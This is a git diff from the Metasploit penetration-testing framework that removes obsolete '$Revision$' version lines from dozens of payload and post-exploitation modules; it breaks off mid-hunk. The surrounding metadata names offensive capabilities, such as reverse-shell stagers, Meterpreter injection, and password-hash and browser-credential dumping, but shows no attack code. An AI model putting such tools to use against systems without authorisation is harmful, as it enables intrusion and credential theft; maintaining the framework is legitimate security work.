-22,7 +22,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager (No NX or Win7)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection (No NX)', 'Author' => 'vlad902', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/bind_tcp.rb b/modules/payloads/stagers/windows/bind_tcp.rb index 6fa8536470..8192c104b9 100644 --- a/modules/payloads/stagers/windows/bind_tcp.rb +++ b/modules/payloads/stagers/windows/bind_tcp.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection', 'Author' => ['hdm', 'skape', 'sf'], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/findtag_ord.rb b/modules/payloads/stagers/windows/findtag_ord.rb index 5b430bb625..13e1ce4f6f 100644 --- a/modules/payloads/stagers/windows/findtag_ord.rb +++ b/modules/payloads/stagers/windows/findtag_ord.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Find Tag Ordinal Stager', - 'Version' => '$Revision$', 'Description' => 'Use an established connection', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/reverse_http.rb b/modules/payloads/stagers/windows/reverse_http.rb index ce8b4f67e1..10555580aa 100644 --- a/modules/payloads/stagers/windows/reverse_http.rb +++ b/modules/payloads/stagers/windows/reverse_http.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse HTTP Stager', - 'Version' => '$Revision$', 'Description' => 'Tunnel communication over HTTP', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb index 92f0392c47..7de4c88665 100644 --- a/modules/payloads/stagers/windows/reverse_https.rb +++ b/modules/payloads/stagers/windows/reverse_https.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse HTTPS Stager', - 'Version' => '$Revision$', 'Description' => 'Tunnel communication over HTTP using SSL', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/reverse_ipv6_http.rb b/modules/payloads/stagers/windows/reverse_ipv6_http.rb index 55bf4e0721..a9f4b22f75 100644 --- a/modules/payloads/stagers/windows/reverse_ipv6_http.rb +++ b/modules/payloads/stagers/windows/reverse_ipv6_http.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse HTTP Stager (IPv6)', - 'Version' => '$Revision$', 'Description' => 'Tunnel communication over HTTP and IPv6', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/reverse_ipv6_https.rb b/modules/payloads/stagers/windows/reverse_ipv6_https.rb index 42b1849f60..b44a445bdf 100644 --- a/modules/payloads/stagers/windows/reverse_ipv6_https.rb +++ b/modules/payloads/stagers/windows/reverse_ipv6_https.rb @@ -16,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse HTTPS Stager (IPv6)', - 'Version' => '$Revision$', 'Description' => 'Tunnel communication over HTTP using SSL and IPv6', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb index 7f0d1d5fbb..f25266394e 100644 --- a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb @@ -23,7 +23,6 @@ module Metasploit3 super(merge_info(info, 'Name' => 'Reverse TCP Stager (IPv6)', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker over IPv6', 'Author' => ['hdm', 'skape', 'sf'], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/reverse_nonx_tcp.rb b/modules/payloads/stagers/windows/reverse_nonx_tcp.rb index 0cf63500aa..6f3ebb2fab 100644 --- a/modules/payloads/stagers/windows/reverse_nonx_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_nonx_tcp.rb @@ -23,7 +23,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager (No NX or Win7)', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker (No NX)', 'Author' => 'vlad902', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/reverse_ord_tcp.rb b/modules/payloads/stagers/windows/reverse_ord_tcp.rb index cebe5294c0..ee7057c01d 100644 --- a/modules/payloads/stagers/windows/reverse_ord_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_ord_tcp.rb @@ -22,7 +22,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse Ordinal TCP Stager (No NX or Win7)', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker', 'Author' => 'spoonm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/reverse_tcp.rb b/modules/payloads/stagers/windows/reverse_tcp.rb index ed6da7da18..3b45e5eb59 100644 --- a/modules/payloads/stagers/windows/reverse_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_tcp.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker', 'Author' => ['hdm', 'skape', 'sf'], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/reverse_tcp_allports.rb b/modules/payloads/stagers/windows/reverse_tcp_allports.rb index 172e1efbda..2e78459f1a 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_allports.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_allports.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse All-Port TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Try to connect back to the attacker, on all possible ports (1-65535, slowly)', 'Author' => ['hdm', 'skape', 'sf'], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/reverse_tcp_dns.rb b/modules/payloads/stagers/windows/reverse_tcp_dns.rb index 3f96489fed..9a51eff845 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_dns.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_dns.rb @@ -22,7 +22,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager (DNS)', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker', 'Author' => ['hdm', 'skape', 'sf'], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/x64/bind_tcp.rb b/modules/payloads/stagers/windows/x64/bind_tcp.rb index 3bfab052d9..d619c1accb 100644 --- a/modules/payloads/stagers/windows/x64/bind_tcp.rb +++ b/modules/payloads/stagers/windows/x64/bind_tcp.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows x64 Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection (Windows x64)', 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/x64/reverse_tcp.rb b/modules/payloads/stagers/windows/x64/reverse_tcp.rb index 2da6d6f5ee..29f4ad7906 100644 --- a/modules/payloads/stagers/windows/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/windows/x64/reverse_tcp.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows x64 Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker (Windows x64)', 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/bsd/x86/shell.rb b/modules/payloads/stages/bsd/x86/shell.rb index 204026ede6..752933e4e1 100644 --- a/modules/payloads/stages/bsd/x86/shell.rb +++ b/modules/payloads/stages/bsd/x86/shell.rb @@ -16,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSD Command Shell', - 'Version' => '$Revision$', 'Description' => 'Spawn a command shell (staged)', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/bsdi/x86/shell.rb b/modules/payloads/stages/bsdi/x86/shell.rb index 976a1c6d50..5e441d082b 100644 --- a/modules/payloads/stages/bsdi/x86/shell.rb +++ b/modules/payloads/stages/bsdi/x86/shell.rb @@ -16,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSDi Command Shell', - 'Version' => '$Revision$', 'Description' => 'Spawn a command shell (staged)', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/java/meterpreter.rb b/modules/payloads/stages/java/meterpreter.rb index 6ce21d9f38..77c52949dd 100644 --- a/modules/payloads/stages/java/meterpreter.rb +++ b/modules/payloads/stages/java/meterpreter.rb @@ -21,7 +21,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'Java Meterpreter', - 'Version' => '$Revision$', 'Description' => 'Run a meterpreter server in Java', 'Author' => [ 'mihi', # all the hard work diff --git a/modules/payloads/stages/java/shell.rb b/modules/payloads/stages/java/shell.rb index 9872c881ff..05dd667fe8 100644 --- a/modules/payloads/stages/java/shell.rb +++ b/modules/payloads/stages/java/shell.rb @@ -22,7 +22,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'Command Shell', - 'Version' => '$Revision$', 'Description' => 'Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)', 'Author' => [ 'mihi', # all the hard work diff --git a/modules/payloads/stages/linux/x64/shell.rb b/modules/payloads/stages/linux/x64/shell.rb index d5088cb6aa..8ab03efa17 100644 --- a/modules/payloads/stages/linux/x64/shell.rb +++ b/modules/payloads/stages/linux/x64/shell.rb @@ -16,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell', - 'Version' => '$Revision$', 'Description' => 'Spawn a command shell (staged)', 'Author' => 'ricky', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/linux/x86/meterpreter.rb b/modules/payloads/stages/linux/x86/meterpreter.rb index 518bcddca2..d83583fec3 100644 --- a/modules/payloads/stages/linux/x86/meterpreter.rb +++ b/modules/payloads/stages/linux/x86/meterpreter.rb @@ -16,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'Linux Meterpreter', - 'Version' => '$Revision$', 'Description' => 'Staged meterpreter server', 'Author' => ['PKS', 'egypt'], 'Platform' => 'linux', diff --git a/modules/payloads/stages/linux/x86/shell.rb b/modules/payloads/stages/linux/x86/shell.rb index cbcc8a5b2c..c4a1a98d6d 100644 --- a/modules/payloads/stages/linux/x86/shell.rb +++ b/modules/payloads/stages/linux/x86/shell.rb @@ -16,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell', - 'Version' => '$Revision$', 'Description' => 'Spawn a command shell (staged)', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/netware/shell.rb b/modules/payloads/stages/netware/shell.rb index b6ca10de12..7edafc0aed 100644 --- a/modules/payloads/stages/netware/shell.rb +++ b/modules/payloads/stages/netware/shell.rb @@ -17,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'NetWare Command Shell', - 'Version' => '$Revision$', 'Description' => 'Connect to the NetWare console (staged)', 'Author' => 'toto', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/osx/armle/execute.rb b/modules/payloads/stages/osx/armle/execute.rb index e32fa740b6..af2e938d33 100644 --- a/modules/payloads/stages/osx/armle/execute.rb +++ b/modules/payloads/stages/osx/armle/execute.rb @@ -16,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X Write and Execute Binary', - 'Version' => '$Revision$', 'Description' => 'Spawn a command shell (staged)', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/osx/armle/shell.rb b/modules/payloads/stages/osx/armle/shell.rb index 1a3e176da4..46c282758b 100644 --- a/modules/payloads/stages/osx/armle/shell.rb +++ b/modules/payloads/stages/osx/armle/shell.rb @@ -16,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X Command Shell', - 'Version' => '$Revision$', 'Description' => 'Spawn a command shell (staged)', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/osx/ppc/shell.rb b/modules/payloads/stages/osx/ppc/shell.rb index 4fc8efe2bf..50a977a4e5 100644 --- a/modules/payloads/stages/osx/ppc/shell.rb +++ b/modules/payloads/stages/osx/ppc/shell.rb @@ -16,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X Command Shell', - 'Version' => '$Revision$', 'Description' => 'Spawn a command shell (staged)', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/osx/x64/dupandexecve.rb b/modules/payloads/stages/osx/x64/dupandexecve.rb index 9896416869..ced651945e 100644 --- a/modules/payloads/stages/osx/x64/dupandexecve.rb +++ b/modules/payloads/stages/osx/x64/dupandexecve.rb @@ -16,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X dup2 Command Shell', - 'Version' => '$Revision$', 'Description' => 'dup2 socket in edi, then execve', 'Author' => 'nemo', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/osx/x86/bundleinject.rb b/modules/payloads/stages/osx/x86/bundleinject.rb index bd0e5b3eb1..47e1c26a76 100644 --- a/modules/payloads/stages/osx/x86/bundleinject.rb +++ b/modules/payloads/stages/osx/x86/bundleinject.rb @@ -15,7 +15,6 @@ require 'msf/core/payload/osx/bundleinject' ### module Metasploit3 - # $Revision$ include Msf::Payload::Osx::BundleInject end diff --git a/modules/payloads/stages/osx/x86/isight.rb b/modules/payloads/stages/osx/x86/isight.rb index 71e36caae2..ea3bc6a195 100644 --- a/modules/payloads/stages/osx/x86/isight.rb +++ b/modules/payloads/stages/osx/x86/isight.rb @@ -26,7 +26,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'Mac OS X x86 iSight Photo Capture', - 'Version' => '$Revision$', 'Description' => 'Inject a Mach-O bundle to capture a photo from the iSight (staged)', 'Author' => 'ddz', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/osx/x86/vforkshell.rb b/modules/payloads/stages/osx/x86/vforkshell.rb index 06ba553a8a..30ee0f44e8 100644 --- a/modules/payloads/stages/osx/x86/vforkshell.rb +++ b/modules/payloads/stages/osx/x86/vforkshell.rb @@ -16,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X (vfork) Command Shell', - 'Version' => '$Revision$', 'Description' => 'Call vfork() if necessary and spawn a command shell (staged)', 'Author' => 'ddz', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/php/meterpreter.rb b/modules/payloads/stages/php/meterpreter.rb index 8a579589bc..46e418764d 100644 --- a/modules/payloads/stages/php/meterpreter.rb +++ b/modules/payloads/stages/php/meterpreter.rb @@ -17,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'PHP Meterpreter', - 'Version' => '$Revision$', 'Description' => 'Run a meterpreter server in PHP', 'Author' => ['egypt'], 'Platform' => 'php', diff --git a/modules/payloads/stages/windows/dllinject.rb b/modules/payloads/stages/windows/dllinject.rb index b46b21163e..f8e1e14c66 100644 --- a/modules/payloads/stages/windows/dllinject.rb +++ b/modules/payloads/stages/windows/dllinject.rb @@ -17,7 +17,6 @@ require 'msf/core/payload/windows/reflectivedllinject' ### module Metasploit3 - # $Revision$ include Msf::Payload::Windows::ReflectiveDllInject end diff --git a/modules/payloads/stages/windows/meterpreter.rb b/modules/payloads/stages/windows/meterpreter.rb index 41fc1d4f89..2db5846006 100644 --- a/modules/payloads/stages/windows/meterpreter.rb +++ b/modules/payloads/stages/windows/meterpreter.rb @@ -24,7 +24,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'Windows Meterpreter (Reflective Injection)', - 'Version' => '$Revision$', 'Description' => 'Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)', 'Author' => ['skape','sf'], 'PayloadCompat' => diff --git a/modules/payloads/stages/windows/patchupdllinject.rb b/modules/payloads/stages/windows/patchupdllinject.rb index f55c463a8d..1228e6431d 100644 --- a/modules/payloads/stages/windows/patchupdllinject.rb +++ b/modules/payloads/stages/windows/patchupdllinject.rb @@ -15,7 +15,6 @@ require 'msf/core/payload/windows/dllinject' ### module Metasploit3 - # $Revision$ include Msf::Payload::Windows::DllInject end diff --git a/modules/payloads/stages/windows/patchupmeterpreter.rb b/modules/payloads/stages/windows/patchupmeterpreter.rb index 2d620b23dc..be0b63ac4b 100644 --- a/modules/payloads/stages/windows/patchupmeterpreter.rb +++ b/modules/payloads/stages/windows/patchupmeterpreter.rb @@ -24,7 +24,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'Windows Meterpreter (skape/jt Injection)', - 'Version' => '$Revision$', 'Description' => 'Inject the meterpreter server DLL (staged)', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/windows/shell.rb b/modules/payloads/stages/windows/shell.rb index e3c587abdb..f99576454a 100644 --- a/modules/payloads/stages/windows/shell.rb +++ b/modules/payloads/stages/windows/shell.rb @@ -17,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Command Shell', - 'Version' => '$Revision$', 'Description' => 'Spawn a piped command shell (staged)', 'Author' => [ 'spoonm', 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/windows/upexec.rb b/modules/payloads/stages/windows/upexec.rb index f9946a0c69..4a16572faf 100644 --- a/modules/payloads/stages/windows/upexec.rb +++ b/modules/payloads/stages/windows/upexec.rb @@ -17,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Upload/Execute', - 'Version' => '$Revision$', 'Description' => 'Uploads an executable and runs it (staged)', 'Author' => ['vlad902', 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/windows/vncinject.rb b/modules/payloads/stages/windows/vncinject.rb index 87cf0082d9..2d4bb4c844 100644 --- a/modules/payloads/stages/windows/vncinject.rb +++ b/modules/payloads/stages/windows/vncinject.rb @@ -25,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'VNC Server (Reflective Injection)', - 'Version' => '$Revision$', 'Description' => 'Inject a VNC Dll via a reflective loader (staged)', 'Author' => [ 'sf' ], 'Session' => Msf::Sessions::VncInject )) diff --git a/modules/payloads/stages/windows/x64/meterpreter.rb b/modules/payloads/stages/windows/x64/meterpreter.rb index bc7a6dcb3c..83715fca48 100644 --- a/modules/payloads/stages/windows/x64/meterpreter.rb +++ b/modules/payloads/stages/windows/x64/meterpreter.rb @@ -25,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'Windows x64 Meterpreter', - 'Version' => '$Revision$', 'Description' => 'Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)', 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/windows/x64/shell.rb b/modules/payloads/stages/windows/x64/shell.rb index 5b5ded3cea..c6120a7355 100644 --- a/modules/payloads/stages/windows/x64/shell.rb +++ b/modules/payloads/stages/windows/x64/shell.rb @@ -17,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows x64 Command Shell', - 'Version' => '$Revision$', 'Description' => 'Spawn a piped command shell (Windows x64) (staged)', 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/windows/x64/vncinject.rb b/modules/payloads/stages/windows/x64/vncinject.rb index 050bd09c20..2ae3e5bb49 100644 --- a/modules/payloads/stages/windows/x64/vncinject.rb +++ b/modules/payloads/stages/windows/x64/vncinject.rb @@ -23,7 +23,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'Windows x64 VNC Server (Reflective Injection)', - 'Version' => '$Revision$', 'Description' => 'Inject a VNC Dll via a reflective loader (Windows x64) (staged)', 'Author' => [ 'sf' ], 'Session' => Msf::Sessions::VncInject )) diff --git a/modules/post/aix/hashdump.rb b/modules/post/aix/hashdump.rb index 33e3b7aae2..6f08ded7c7 100644 --- a/modules/post/aix/hashdump.rb +++ b/modules/post/aix/hashdump.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ Post Module to dump the password hashes for all users on an AIX System}, 'License' => MSF_LICENSE, 'Author' => ['theLightCosine'], - 'Version' => '$Revision$', 'Platform' => [ 'aix' ], 'SessionTypes' => [ 'shell' ] )) diff --git a/modules/post/cisco/gather/enum_cisco.rb b/modules/post/cisco/gather/enum_cisco.rb index 0450469bac..c9cabb9ac7 100644 --- a/modules/post/cisco/gather/enum_cisco.rb +++ b/modules/post/cisco/gather/enum_cisco.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'cisco'], 'SessionTypes' => [ 'shell' ] )) diff --git a/modules/post/linux/gather/checkvm.rb b/modules/post/linux/gather/checkvm.rb index 3e0a17b254..b1caef36a3 100644 --- a/modules/post/linux/gather/checkvm.rb +++ b/modules/post/linux/gather/checkvm.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Post and QEMU/KVM.}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'linux' ], 'SessionTypes' => [ 'shell', 'meterpreter' ] )) diff --git a/modules/post/linux/gather/enum_network.rb b/modules/post/linux/gather/enum_network.rb index 7d1a1c59e0..1c89a65727 100644 --- a/modules/post/linux/gather/enum_network.rb +++ b/modules/post/linux/gather/enum_network.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Post 'ohdae ', # minor additions, modifications & testing 'Stephen Haywood ', # enum_linux ], - 'Version' => '$Revision$', 'Platform' => [ 'linux' ], 'SessionTypes' => [ 'shell' ] )) diff --git a/modules/post/linux/gather/enum_system.rb b/modules/post/linux/gather/enum_system.rb index 41936215d0..c805b2d672 100644 --- a/modules/post/linux/gather/enum_system.rb +++ b/modules/post/linux/gather/enum_system.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Post 'sinn3r', # Testing and modification of original enum_linux 'ohdae ', # Combined separate mods, modifications and testing ], - 'Version' => '$Revision$', 'Platform' => [ 'linux' ], 'SessionTypes' => [ 'shell' ] )) diff --git a/modules/post/linux/gather/enum_users_history.rb b/modules/post/linux/gather/enum_users_history.rb index b7198a99fc..a6f181b302 100644 --- a/modules/post/linux/gather/enum_users_history.rb +++ b/modules/post/linux/gather/enum_users_history.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Post # based largely on get_bash_history function by Stephen Haywood 'ohdae ' ], - 'Version' => '$Revision$', 'Platform' => [ 'linux' ], 'SessionTypes' => [ 'shell' ] )) diff --git a/modules/post/linux/gather/hashdump.rb b/modules/post/linux/gather/hashdump.rb index b336aa0ce7..fb25a0a688 100644 --- a/modules/post/linux/gather/hashdump.rb +++ b/modules/post/linux/gather/hashdump.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ Post Module to dump the password hashes for all users on a Linux System}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'linux' ], 'SessionTypes' => [ 'shell' ] )) diff --git a/modules/post/multi/gather/apple_ios_backup.rb b/modules/post/multi/gather/apple_ios_backup.rb index 3e6088542b..2346a4293c 100644 --- a/modules/post/multi/gather/apple_ios_backup.rb +++ b/modules/post/multi/gather/apple_ios_backup.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Post 'hdm', 'bannedit' # Based on bannedit's pidgin_cred module structure ], - 'Version' => '$Revision$', 'Platform' => ['win', 'osx'], 'SessionTypes' => ['meterpreter', 'shell'] )) diff --git a/modules/post/multi/gather/dns_bruteforce.rb b/modules/post/multi/gather/dns_bruteforce.rb index 89f062840b..c20dc9f0f9 100644 --- a/modules/post/multi/gather/dns_bruteforce.rb +++ b/modules/post/multi/gather/dns_bruteforce.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win','linux', 'osx', 'bsd', 'solaris' ], 'SessionTypes' => [ 'meterpreter', 'shell' ] )) diff --git a/modules/post/multi/gather/dns_reverse_lookup.rb b/modules/post/multi/gather/dns_reverse_lookup.rb index e979d96f10..9efffbf109 100644 --- a/modules/post/multi/gather/dns_reverse_lookup.rb +++ b/modules/post/multi/gather/dns_reverse_lookup.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win','linux', 'osx', 'bsd', 'solaris' ], 'SessionTypes' => [ 'meterpreter', 'shell' ] )) diff --git a/modules/post/multi/gather/dns_srv_lookup.rb b/modules/post/multi/gather/dns_srv_lookup.rb index 9f5f1dccb6..693ee1a91f 100644 --- a/modules/post/multi/gather/dns_srv_lookup.rb +++ b/modules/post/multi/gather/dns_srv_lookup.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win','linux', 'osx', 'bsd', 'solaris' ], 'SessionTypes' => [ 'meterpreter','shell' ] )) diff --git a/modules/post/multi/gather/enum_vbox.rb b/modules/post/multi/gather/enum_vbox.rb index e275987c41..4bb07f689a 100644 --- a/modules/post/multi/gather/enum_vbox.rb +++ b/modules/post/multi/gather/enum_vbox.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['theLightCosine'], - 'Version' => '$Revision$', 'Platform' => ['unix', 'bsd', 'linux', 'osx', 'win'], 'SessionTypes' => ['shell', 'meterpreter' ] )) diff --git a/modules/post/multi/gather/env.rb b/modules/post/multi/gather/env.rb index 89b0d792f4..c8141827ef 100644 --- a/modules/post/multi/gather/env.rb +++ b/modules/post/multi/gather/env.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module prints out the operating system environment variables }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez ', 'egypt' ], - 'Version' => '$Revision$', 'Platform' => [ 'linux', 'win' ], 'SessionTypes' => [ 'shell', 'meterpreter' ] )) diff --git a/modules/post/multi/gather/filezilla_client_cred.rb b/modules/post/multi/gather/filezilla_client_cred.rb index 598378d67b..252525e38b 100644 --- a/modules/post/multi/gather/filezilla_client_cred.rb +++ b/modules/post/multi/gather/filezilla_client_cred.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Post 'bannedit', # post port, added support for shell sessions 'Carlos Perez ' # original meterpreter script ], - 'Version' => '$Revision$', 'Platform' => ['unix', 'bsd', 'linux', 'osx', 'win'], 'SessionTypes' => ['shell', 'meterpreter' ] )) diff --git a/modules/post/multi/gather/find_vmx.rb b/modules/post/multi/gather/find_vmx.rb index c25f619df0..82eaf62ec9 100644 --- a/modules/post/multi/gather/find_vmx.rb +++ b/modules/post/multi/gather/find_vmx.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['theLightCosine'], - 'Version' => '$Revision$', 'Platform' => ['unix', 'bsd', 'linux', 'osx', 'win'], 'SessionTypes' => ['shell', 'meterpreter' ] )) diff --git a/modules/post/multi/gather/firefox_creds.rb b/modules/post/multi/gather/firefox_creds.rb index 2b8de7398d..62944537bb 100644 --- a/modules/post/multi/gather/firefox_creds.rb +++ b/modules/post/multi/gather/firefox_creds.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['bannedit'], - 'Version' => '$Revision$', 'Platform' => ['win', 'linux', 'bsd', 'unix', 'osx'], 'SessionTypes' => ['meterpreter', 'shell' ] )) diff --git a/modules/post/multi/gather/multi_command.rb b/modules/post/multi/gather/multi_command.rb index 104e2d2f15..6a171d4c28 100644 --- a/modules/post/multi/gather/multi_command.rb +++ b/modules/post/multi/gather/multi_command.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Post execute the commands in the specified Meterpreter or shell session.}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win', 'linux', 'bsd', 'unix', 'osx' ], 'SessionTypes' => [ 'meterpreter','shell' ] )) diff --git a/modules/post/multi/gather/pidgin_cred.rb b/modules/post/multi/gather/pidgin_cred.rb index ed7c3b81c6..d7b0b6d06c 100644 --- a/modules/post/multi/gather/pidgin_cred.rb +++ b/modules/post/multi/gather/pidgin_cred.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Post 'bannedit', # post port, added support for shell sessions 'Carlos Perez ' # original meterpreter script ], - 'Version' => '$Revision$', 'Platform' => ['unix', 'bsd', 'linux', 'osx', 'win'], 'SessionTypes' 